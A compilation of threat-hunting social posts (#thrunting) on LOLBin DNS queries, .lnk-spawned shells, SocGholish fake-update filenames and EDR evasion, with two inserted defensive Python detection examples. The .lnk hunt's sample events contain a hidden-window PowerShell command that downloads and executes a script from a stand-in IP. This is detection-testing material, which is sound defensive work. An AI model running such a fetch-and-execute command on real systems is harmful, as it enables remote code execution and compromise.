Had a fun topic pop up on my #github feed today, looks like a nice hub for #malware. If only I had time to look at it 😭
https://github.com/topics/cs-go-hack-2023
(DISCLAIMER: Don't be dumb, no one is giving you csgo hax, just get good at the game lmao)
#github #malware #infosec #thrunting
#Windows thrunting idea:
#LOLBINs making #DNS queries to domains under 6 months old 🤔
Hypothesis: malware domains are typically younger, FPs should be fairly easy to identify, and this may shrink the sample size for large orgs
#ThreatHunting #Thrunting #ThreatIntel #InfoSec #Cyber #CyberSecurity #InformationSecurity
When did Thrunting become a thing? Did we really need to shorten threat hunting? #thrunting #threathunting
I totally forgot about this place!! But hey maybe I should be involved again.
To my #CTI #SOC folks out there, what do you do with the massive scanning IP threat feeds? Are you ingesting them into SIEM for alerting?
If you are ingesting bot IPs and scanning IPs, what confidence and severity level do you set your threshold to ingest high fidelity indicators?
I want to know what everyone’s thoughts and strategies are on ingesting low-yield indicators.
#cti #soc #threatintel #ioc #threathunting #thrunting
It is Thrunting Thursday - what are you looking for today?
I'll be looking for .lnk files that spawn processes with a child or grandchild process that is cmd or powershell - especially originating from non-C:\ drives
#thrunting #threathunting #blueteam #detection
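An example implementation of the Thrunting Thursday hunt above, added here and not part of the original post. It assumes process-creation telemetry with Sysmon Event ID 1 style fields and that the shortcut path shows up in a command line (as it does when a shortcut is opened via explorer.exe <path>.lnk or cmd /c start <path>.lnk; other products expose it in different fields). The events are constructed, the regex and the depth-2 tree walk are this example's own, and hits from non-C: drives are sorted to the top.

```python
import re
from collections import defaultdict

# Constructed process-creation records (Sysmon Event ID 1 style fields); not real telemetry.
PROC_EVENTS = [
    {"ProcessId": 3000, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
    # Shortcut opened from a removable drive, leading to cmd -> powershell (the pattern hunted)
    {"ProcessId": 4000, "ParentProcessId": 3000, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "E:\Invoices\Q4_Report.pdf.lnk"'},
    {"ProcessId": 4100, "ParentProcessId": 4000, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -w hidden -c "iwr http://203.0.113.7/a.ps1 | iex"'},
    {"ProcessId": 4200, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.7/a.ps1 | iex"'},
    # Benign desktop shortcut: no shell anywhere in the tree
    {"ProcessId": 5000, "ParentProcessId": 3000, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "C:\Users\bob\Desktop\Notepad.lnk"'},
    {"ProcessId": 5100, "ParentProcessId": 5000, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    # Shortcut on C: that spawns cmd: still a hit, just lower priority than the off-C: one
    {"ProcessId": 6000, "ParentProcessId": 3000, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "C:\Users\bob\Downloads\setup.lnk"'},
    {"ProcessId": 6100, "ParentProcessId": 6000, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hi"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Drive letter, then anything up to the first .lnk; assumes the path is not quoted mid-way.
LNK_RE = re.compile(r'([A-Za-z]):\\[^"]*?\.lnk\b', re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def hunt_lnk_shell_spawns(events, max_depth=2):
    """Find processes whose command line references a .lnk and that have a
    cmd/powershell child or grandchild. Returns hits, off-C: drives first."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ParentProcessId"]].append(ev)
    hits = []
    for ev in events:
        m = LNK_RE.search(ev["CommandLine"])
        if not m:
            continue
        shells = []
        frontier = [(1, c) for c in children[ev["ProcessId"]]]  # breadth-first walk
        while frontier:
            depth, proc = frontier.pop(0)
            if basename(proc["Image"]) in SHELLS:
                shells.append((depth, basename(proc["Image"])))
            if depth < max_depth:
                frontier.extend((depth + 1, c) for c in children[proc["ProcessId"]])
        if shells:
            drive = m.group(1).upper()
            hits.append({"pid": ev["ProcessId"], "lnk": m.group(0), "drive": drive,
                         "off_c": drive != "C", "shells": shells})
    hits.sort(key=lambda h: not h["off_c"])  # stable: off-C: hits float to the top
    return hits


if __name__ == "__main__":
    for h in hunt_lnk_shell_spawns(PROC_EVENTS):
        print(f'pid {h["pid"]} {h["lnk"]} drive={h["drive"]} off_c={h["off_c"]} shells={h["shells"]}')
```

Pid reuse is ignored here; on real data key the tree on a process GUID rather than ProcessId, and widen max_depth if the actor inserts a wrapper like conhost or wscript between the shortcut and the shell.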
New episode of DISCARDED! 🎙️🔮
We’re joined by Rich Gonzalez, Daniel Blackford, and @adorais to talk about what we expect to see from threat actors this year. Lots of really great insights about actor TTP changes, vulnerability exploitation, MFA bypass, and more. Tune in!
#podcast #cybersecurity #threatintelligence #threatdetection #thrunting
Spotify: https://open.spotify.com/episode/15SwTlR0ziMoHSfSAJVuyC?si=b5268e7df9f744e5
Web: https://www.proofpoint.com/us/podcasts/discarded#123486
It is THRUNTING THURSDAY!
What are you hunting for today?
#thrunting #threathunting #thruntingthursday
You can't teach instinct. But you can train it and foster it and let it grow, and within a few months suddenly the folks who joined after you and felt overwhelmed are carving out evil and smashing badness every day. #blueteam #thrunting
what are your favorite things to do with #PowerShell to #ActiveDirectory? I've been cleared to poke at a target.
#redTeam #blueTeam #infosec #pentest #threathunting #thrunting
I found this through someone on here, but I cannot seem to find the original posting. This site is a must share though for threat hunters:
https://app.tidalcyber.com/share/f09fa1b1-51a6-4a6f-98ff-de2b86cee0cd
This site is awesome. Not only does it display the MITRE stuff, this shared matrix gives you so much more. What blew me away specifically about Tidal was that not only does it show the technique used, IT LITERALLY SHOWS YOU WHAT DEFENSE SOFTWARE CAN DETECT IT AND WHAT RULE TO ENABLE TO DETECT IT! This is so awesome! Below is an example for Elastic, among others: https://app.tidalcyber.com/capability/521674d6-6514-4e34-bc21-162323ac830b-Account%20Password%20Reset%20Remotely
Happy hunting and learning!
#threatintel #threathunting #security #ELK #elastic #thrunting
Kudos to virustotal for the cheatsheet they dropped today (https://blog.virustotal.com/2022/12/vt-intelligence-cheat-sheet.html). They already had their various search modifiers documented, but this gives a dense set of concrete examples of how they can be used in realistic threat hunting queries. #CTI #VTI #virustotal #thrunting
A colleague of mine discovered a pattern in the downloaded stage 3 SocGholish payload. We've seen a few examples of this file in the most recent campaign where they use special characters in their file name such as:
Chromе.Uрdatе.zip
We've noticed a pattern though - in all of our SIEM queries the TargetFilePath always contained the characters 'dat' in the filename.
As such we wrote a simple Sigma rule that can identify that file name. This of course is only useful for this current campaign and the TA can easily adjust file names - but it may be helpful for threat hunting!
TargetFileName|contains:
- "dat\\ufffd\\ufffd.zip"
https://github.com/joshnck/Sigma_Rules/blob/main/apt_socgholish_fakeupdate.yml
#SocGholish #thrunting #threathunting #ioc
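An added example for the post above, not the author's own code or the linked Sigma rule. It shows where the "dat\ufffd\ufffd.zip" pattern comes from (a SIEM decoding the UTF-8 bytes of each Cyrillic letter as ASCII, so every undecodable byte becomes U+FFFD, two per letter) and pairs the narrow campaign check with a broader one that flags any filename whose stem mixes Latin and Cyrillic letters, which survives the actor swapping in different look-alike letters. The sample names are constructed with escapes so the Cyrillic letters are unambiguous; the first one is modelled on the name quoted in the post, the rest are controls.

```python
import unicodedata

# Constructed TargetFilename samples. The first is modelled on the name in the post:
# Latin letters with Cyrillic ie (U+0435) and er (U+0440) swapped in.
SAMPLE_NAMES = [
    "Chrom\u0435.U\u0440dat\u0435.zip",   # the reported SocGholish-style name
    "Firefox.Upd\u0430te.zip",            # same trick, different letter (Cyrillic a), no "dat"
    "Chrome.Update.zip",                  # all-Latin look-alike, benign
    "\u041e\u0442\u0447\u0451\u0442.zip", # all-Cyrillic stem: a legitimate non-English name
]


def as_seen_by_ascii_siem(name):
    """Reproduce the mangling behind the Sigma pattern: UTF-8 bytes decoded as
    ASCII, one U+FFFD per byte the decoder cannot handle (two per Cyrillic letter)."""
    return name.encode("utf-8").decode("ascii", errors="replace")


def matches_campaign_pattern(name):
    # The narrow, campaign-specific check the post's rule relies on.
    return "dat\ufffd\ufffd.zip" in as_seen_by_ascii_siem(name)


def stem(name):
    # Compare scripts on the stem only; the extension is Latin for nearly every file.
    return name.rsplit(".", 1)[0] if "." in name else name


def scripts_in(text):
    # First word of the Unicode character name is the script: LATIN, CYRILLIC, GREEK, ...
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ch.isalpha()}


def is_mixed_script(name):
    """Broader check: Latin and Cyrillic letters in the same stem is a homoglyph
    red flag whichever letters the actor chooses next time."""
    s = scripts_in(stem(name))
    return "LATIN" in s and "CYRILLIC" in s


def triage(names):
    return [{"name": n, "mangled": as_seen_by_ascii_siem(n),
             "campaign_rule": matches_campaign_pattern(n),
             "mixed_script": is_mixed_script(n)} for n in names]


if __name__ == "__main__":
    for row in triage(SAMPLE_NAMES):
        print(f'{row["mangled"]!r:45} campaign={row["campaign_rule"]} mixed={row["mixed_script"]}')
```

The second sample is the point of the caveat in the post: a one-letter change defeats the "dat" rule but still trips the mixed-script check, while the all-Cyrillic name stays clean because the extension is excluded from the comparison. How a given SIEM renders the bytes (one or two replacement characters, or a correctly decoded string) decides which form of the pattern a rule must match, so confirm it against a real event before deploying.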
Attack surface does not just mean "known vulnerability" i.e. a public CVE. It means anywhere your technical controls are lax or cannot be implemented in their usual format. #blueteam #thrunting
This industry will hammer on as many high speed low-drag topics as possible: zero-trust, AI/ML analysis/-enabled EDR, vendor partnerships to increase cloud security...and the entirety of the conversation will happen between 10 people via an on-prem Exchange 2012 server through Office 2008 Outlook installs.
After a several week hiatus #AvosLocker has started bidding in auctions held by initial access brokers again. I expect to see new victims posted soon on their blog. #OSINT #ThreatIntel #CTI #ransomware #thrunting
New Villain (improved Hoaxshell) backdoor runs without obfuscation on #CrowdStrike Falcon Win10 machine. It previously had bypassed Defender and SentinelOne also.
I've sent data to our CS reps to make them aware.
#infosec #thrunting